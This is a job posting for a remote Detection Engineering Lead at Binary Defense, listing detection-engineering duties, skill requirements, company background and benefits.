Detection Engineering Lead - REMOTE

Description

Binary Defense is seeking a Detection Engineering Lead to serve as both a technical leader and hands-on contributor within our Detection Engineering function. This is a working manager position responsible for managing the day-to-day operations of the detection engineering team, while also actively participating in detection logic development, telemetry analysis, and strategy execution.

You’ll play a pivotal role in evolving and implementing a scalable detection GitOps process that aligns to business risk, quantifiable metrics, and coverage across the MITRE ATT&CK framework. This role requires deep technical expertise, strong cross-functional communication, and the ability to deliver high-impact security detections at scale.

Key Responsibilities:

• Lead and mentor a team of Detection Engineers in designing, developing, and maintaining threat detection logic across SIEM, EDR, and cloud platforms.
• Actively contribute to detection development efforts — including rule creation, tuning, threat modeling, and attack simulation — with an eye toward quality, performance, and detection efficacy.
• Develop and maintain a structured detection engineering as code lifecycle — from ideation to testing, deployment, tuning, and retirement — with appropriate documentation and traceability.
• Establish detection coverage tracking and reporting metrics aligned to business-critical assets and MITRE ATT&CK, including quantifiable risk scoring tied to each detection.
• Collaborate across teams (Threat Intel, Incident Response, Security Engineering, Cloud Engineering, etc.) to ensure detections are informed by real-world threats and deployed across the correct telemetry.
• Analyze telemetry quality and advocate for improvements to logging pipelines, data normalization, and event enrichment based on detection requirements.
• Stay current on emerging attacker TTPs, threat actors, and malware trends to ensure proactive detection coverage.
• Support attack testing to validate detection logic and improve effectiveness.
• Own onboarding and documentation of detection tooling, processes, and coverage across the organization.
• Serve as the subject matter expert on telemetry sources and their detection use cases across endpoint, network, application, and cloud layers.

Requirements

• 5+ years of experience in detection engineering, threat hunting, or security operations.
• 2+ years in a leadership or mentoring role within a security engineering team.
• Proven experience developing and tuning detection rules across SIEM platforms (e.g., Splunk, Sentinel, Chronicle), EDR solutions (e.g., CrowdStrike, SentinelOne), and Cloud environments (e.g., AWS, GCP, Azure).
• Deep understanding of telemetry sources such as Windows Event Logs, Sysmon, PowerShell logs, DNS, proxy/firewall, cloud audit logs, and their detection potential.
• Familiarity with attack chains and adversary tradecraft including MITRE ATT&CK, LOLBAS, process injection, credential access, lateral movement, cloud control plane abuse, etc.
• Strong understanding of security data modeling, detection-as-code practices, and the use of frameworks like SIGMA or YARA-L.
• Experience with REST API interfaces and using automation to streamline detection development or testing.
• Strong written and verbal communication skills with the ability to translate complex technical threats into understandable business risk.
• Ability to balance project management responsibilities with individual technical contributions.

Preferred Qualifications

• Experience implementing or contributing to a Detection Engineering framework or strategy (e.g., Palantir ADS, MITRE D3FEND, etc.)
• Familiarity with risk scoring methodologies and mapping detections to risk reduction outcomes.
• Experience working in a multi-tenant or MDR environment and building detections at scale.
• Knowledge of data pipeline tools and log forwarding agents (e.g., Fluent Bit, Logstash, Elastic Agent, Sysmon XML config tuning).
• Hands-on experience with attack simulation tools like Atomic Red Team, Caldera, or manual adversary emulation.

About Binary Defense

Binary Defense is a trusted leader in security operations, supporting companies of all sizes to proactively monitor, detect and respond to cyberattacks. The company offers a personalized Open XDR approach to Managed Detection and Response, advanced Threat Hunting, Digital Risk Protection, Phishing Response, and Incident Response services, helping customers mature their security program efficiently and effectively based on their unique risks and business needs.

With a world-class 24/7 SOC, deep domain expertise in cyber, and sophisticated technology, hundreds of companies across every industry have entrusted Binary Defense to protect their business. Binary Defense gives companies actionable insights within minutes not hours, the confidence in their program to be resilient to ever-changing threats, and the time back that matters most to their business.

Binary Defense is also the Trusted Cybersecurity Partner of the Cleveland Browns and partners with PGA TOUR players. For more information, visit ourwebsite, check out ourblog, or follow us onLinkedIn.

Binary Defense offers competitive medical, dental and vision coverage for employees and dependents, a 401k match which vests every payroll, a flexible and remote friendly work environment, as well as training opportunities to expand your skill set (to name a few!). If you’re interested in joining a growing team with great perks, we encourage you to apply!